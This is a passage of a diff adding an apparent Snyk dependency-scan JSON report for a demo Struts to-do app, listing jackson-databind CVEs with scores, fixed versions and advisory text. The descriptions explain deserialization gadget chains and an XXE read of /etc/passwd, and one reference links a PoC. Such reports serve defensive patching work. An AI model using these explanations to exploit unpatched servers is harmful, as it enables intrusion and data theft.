"from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + 
"isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1047324", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Srikanth Ramu", + "threedr3am'follower" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2658", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/pull/2864%23issuecomment-701026600", + "title": "GitHub PR" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:52:55.201119Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:02:44.942188Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:55.201119Z" + } + ], + "description": "## 
Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to the class `ignite-jta`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2658)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/2864#issuecomment-701026600)\n", + "epssDetails": { + "percentile": "0.75677", + "probability": "0.00464", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10650" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-11-29T12:43:11.601162Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ], + 
"functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-09-29T22:30:33Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-11-29T15:58:07.317638Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:55.201119Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1048302", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", + "credit": [ + "Bartosz Baranowski" + ], + "semver": { + "vulnerable": [ + "[2.6.0,2.6.7.4)", + "[2.9.0,2.9.10.7)", + "[2.10.0, 2.10.5.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.6.7.4", + "2.9.10.7", + "2.10.5.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.2, + "functions": [ + { + "version": [ + "[2.6.0,2.6.7.4)", + "[2.9.0,2.9.10.7)", + "[2.10.0, 2.10.5.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ext/DOMSerializer.java", + "className": "DOMSerializer", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": 
"com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2589", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1887664", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", + "cvssV3BaseScore": 5.8, + "modificationTime": "2024-03-11T09:49:41.313444Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:50:46.628614Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:14.249736Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.2, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:31.367594Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", + "assigner": "SUSE", + "severity": "medium", + "baseScore": 5.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:41.313444Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:46.628614Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:14.249736Z" + } + ], + 
"description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. A flaw was found in FasterXML Jackson Databind, where it does not have entity expansion secured properly in the `DOMDeserializer` class. The highest threat from this vulnerability is data integrity.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.7, 2.10.5.1 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2589)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1887664)\n", + "epssDetails": { + "percentile": "0.68432", + "probability": "0.00275", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-25649" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-288c-cq4h-88gq" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-04T11:58:40.054903Z", + "functions_new": [ + { + "version": [ + "[2.6.0,2.6.7.4)", + "[2.9.0,2.9.10.7)", + "[2.10.0, 2.10.5.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ext.DOMSerializer", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-04T11:54:03Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-04T15:22:52Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:14.249736Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": 
[ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052449", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2986", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.926544Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:26.923105Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:42.491903Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red 
Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.926544Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:26.923105Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. 
However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-35490" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-18T11:37:26.422837Z", + "functions_new": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-18T11:32:48Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-18T16:33:11Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:26.923105Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052450", + "title": "Deserialization of 
Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2986", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.975620Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:57.453912Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.762302Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.975620Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:57.453912Z" + } + ], + "description": "## 
Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. 
Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-35491" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-18T11:40:53.658144Z", + "functions_new": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-18T11:40:13Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-18T16:33:11Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:50:57.453912Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1054588", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", + "credit": [ + "bu5yer" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2999", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Post" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-35728", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:49:38.478896Z" + }, + { + "assigner": "NVD", + "severity": 
"high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:01.576739Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.852735Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:43.478254Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:38.478896Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:01.576739Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.852735Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
It mishandles the interaction between serialization gadgets and typing, related to `com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool` (aka embedded Xalan in `org.glassfish.web/javax.servlet.jsp.jstl`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
